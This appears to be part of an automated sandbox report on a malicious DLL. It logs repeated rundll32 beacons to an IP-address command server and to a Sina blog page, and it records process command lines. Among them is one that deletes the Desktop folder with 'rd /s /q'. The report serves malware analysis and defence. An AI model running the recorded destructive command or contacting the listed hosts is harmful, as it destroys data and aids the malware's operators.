                                                                                                                                                                        Dec 19, 2024 15:46:34.040075064 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        88192.168.2.1149841116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:34.040631056 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:35.873550892 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:35 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        89192.168.2.1149843107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:37.935661077 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        90192.168.2.1149844116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:38.058943033 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:39.809197903 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:39 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        91192.168.2.1149845107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:38.059036970 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        92192.168.2.1149847107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:41.653532982 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        93192.168.2.1149848116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:41.773252010 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        94192.168.2.1149849107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:41.773751974 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        95192.168.2.1149850107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:42.342484951 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        96192.168.2.1149851107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:42.342596054 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        97192.168.2.1149852116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:42.357618093 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:44.107714891 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:43 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        98192.168.2.1149854107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:46.467531919 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        99192.168.2.1149855107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:46.467701912 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        100192.168.2.1149856116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:46.467892885 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:48.311642885 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:48 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        101192.168.2.1149859107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:50.482780933 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        102192.168.2.1149860107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:50.618869066 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.1149731116.133.8.924431232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-19 14:44:47 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2024-12-19 14:44:49 UTC653INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:44:48 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 12839
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Origin-Agent-Cluster: ?0
                                                                                                                                                                        P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Expires: Thu, 19 Dec 2024 14:44:47 GMT
                                                                                                                                                                        Last-Modified: Thu, 19 Dec 2024 02:25:10 GMT+8
                                                                                                                                                                        DPOOL_HEADER: 10.13.3.118
                                                                                                                                                                        strict-transport-security: max-age=180
                                                                                                                                                                        Content-Security-Policy: upgrade-insecure-requests
                                                                                                                                                                        Age: 73178
                                                                                                                                                                        X-Cache: HIT from fe1506ed4d61
                                                                                                                                                                        Content-Security-Policy: upgrade-insecure-requests
                                                                                                                                                                        X-Via-SSL: ssl.51.sinag1.hj4.lb.sinanode.com
                                                                                                                                                                        2024-12-19 14:44:49 UTC7579INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 46 61 6b 65 2d 4a 61 70 61 6e 65 73 65 5f e6
                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="//www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Fake-Japanese_
                                                                                                                                                                        2024-12-19 14:44:49 UTC5260INData Raw: 69 64 3d 22 63 6f 6d 70 5f 39 30 31 5f 73 63 6f 72 65 22 3e 3c 73 74 72 6f 6e 67 3e 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 69 6e 66 6f 5f 6c 69 73 74 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 53 47 5f 74 78 74 63 22 3e e5 8d 9a e5 ae a2 e8 ae bf e9 97 ae ef bc 9a 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 69 64 3d 22 63 6f 6d 70 5f 39 30 31 5f 70 76 22 3e 3c 73 74 72 6f 6e 67 3e 33 34 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: id="comp_901_score"><strong>0</strong></span></li> </ul> <ul class="info_list2"> <li><span class="SG_txtc"></span><span id="comp_901_pv"><strong>345</strong></span></li>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.1149749116.133.8.924431232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-19 14:45:03 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.1149757116.133.8.924431232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-19 14:45:11 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.1149782116.133.8.924431232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-19 14:45:36 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        4192.168.2.1149786116.133.8.924431232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-19 14:45:40 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                        Statistics

                                                                                                                                                                        CPU Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Memory Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Behavior

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll"
                                                                                                                                                                        Imagebase:0x2a0000
                                                                                                                                                                        File size:126'464 bytes
                                                                                                                                                                        MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:2
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff68cce0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:3
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1
                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,ClassObject
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:6
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff68cce0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                                        File size:18'944 bytes
                                                                                                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:10
                                                                                                                                                                        Start time:09:44:10
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,InputFile
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:09:44:13
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,PrintFile
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:14
                                                                                                                                                                        Start time:09:44:13
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 672
                                                                                                                                                                        Imagebase:0xe90000
                                                                                                                                                                        File size:483'680 bytes
